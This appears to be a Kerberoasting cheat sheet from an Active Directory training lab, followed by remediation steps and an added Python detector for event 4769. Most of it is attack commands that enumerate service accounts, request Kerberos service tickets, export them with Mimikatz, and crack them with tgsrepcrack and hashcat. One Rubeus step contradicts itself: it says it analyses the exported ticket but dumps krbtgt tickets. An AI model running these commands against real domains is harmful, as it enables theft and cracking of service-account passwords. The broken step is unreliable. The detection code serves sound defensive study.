🟢Kerberoast
Find user accounts used as service accounts
. ./GetUserSPNs.ps1
Get-NetUser -SPN
Get-NetUser -SPN | select samaccountname,serviceprincipalname
Request a TGS
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
or
Request-SPNTicket "MSSQLSvc/dcorp.dollarycorp.local"
Export ticket using Mimikatz
Invoke-Mimikatz -Command '"Kerberos::list /export"'
Crack the ticket
Crack the password for the service account
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\2-40a10000-student1@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi
.\hashcat.exe -m 13100 -a 0 <HASH FILE> <WORDLIST>   # 13100 = Kerberos 5 TGS-REP etype 23 (Kerberoast); 18200 is the AS-REP mode

Analyzing the ticket with Rubeus
Once you have exported the ticket using Mimikatz, analyze it with Rubeus to get the hash for cracking.
.\Rubeus.exe dump /service:krbtgt /outfile:ticket.txt
Investigate the contents of ticket.txt for the hash to use in the next step.
Using Hashcat for password recovery
Now that you have the hash, proceed with Hashcat to attempt to recover the password.
.\hashcat.exe -m 13100 -a 0 -o cracked.txt ticket.txt 10k-worst-pass.txt
Inspect cracked.txt to see if the password recovery was successful. If the password is not found, consider using a larger or more targeted wordlist based on password creation policies.
Post-compromise steps
After successfully cracking the ticket:
Secure the compromised account immediately by resetting its password.
Investigate how the service account credentials were exposed.
Audit services that utilize this account to check for unauthorized changes or activities.
Implement account monitoring to detect future suspicious activities.
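The monitoring item above, and the TGS-request step of the Kerberoast procedure, can be turned into a concrete check on Windows Security event 4769. The following is an added example (not part of this cheat sheet) that runs detection logic over constructed 4769 records; field names follow the event schema, while the timestamps, account and service names are made up.

```python
# Added example: flag Kerberoast-like activity in Windows Security event 4769.
# Signals: RC4-HMAC ticket encryption (TicketEncryptionType 0x17) for a service run
# under a user account (not krbtgt, not a computer account ending in $), and one
# requester collecting several distinct services within a short window.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"              # etype 23, the ticket type tgsrepcrack / hashcat 13100 target
WINDOW = timedelta(minutes=5)
SPN_THRESHOLD = 3              # distinct services per requester; tune per environment

# Constructed sample 4769 records (values are made up for this example).
EVENTS = [
    {"TimeCreated": "2024-05-01T10:00:01", "TargetUserName": "student1@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TimeCreated": "2024-05-01T10:00:05", "TargetUserName": "student1@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "DCORP-MGMT$", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TimeCreated": "2024-05-01T10:00:06", "TargetUserName": "student1@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "svcadmin", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TimeCreated": "2024-05-01T10:00:07", "TargetUserName": "student1@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TimeCreated": "2024-05-01T10:00:09", "TargetUserName": "student1@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "websvc", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TimeCreated": "2024-05-01T10:30:00", "TargetUserName": "jdoe@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17", "Status": "0x0"},
]

def is_roastable_request(ev):
    """True when a successful 4769 asks for an RC4 ticket to a user-account service."""
    svc = ev["ServiceName"]
    return (ev["Status"] == "0x0"
            and ev["TicketEncryptionType"].lower() == RC4_HMAC
            and svc.lower() != "krbtgt"
            and not svc.endswith("$"))

def detect_kerberoast(events, window=WINDOW, threshold=SPN_THRESHOLD):
    """Map requester -> sorted distinct services for requesters that reach the threshold."""
    per_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if is_roastable_request(ev):
            t = datetime.fromisoformat(ev["TimeCreated"])
            per_user[ev["TargetUserName"]].append((t, ev["ServiceName"]))
    alerts = {}
    for user, reqs in per_user.items():
        for i, (t0, _) in enumerate(reqs):          # sliding window starting at each request
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(in_window) >= threshold:
                alerts[user] = sorted(in_window)
                break
    return alerts
```

A single RC4 request (jdoe above) stays below the threshold; a burst of RC4 requests for several user-account services from one principal, which is what the SPN enumeration and ticket requests on this page produce, is what gets flagged.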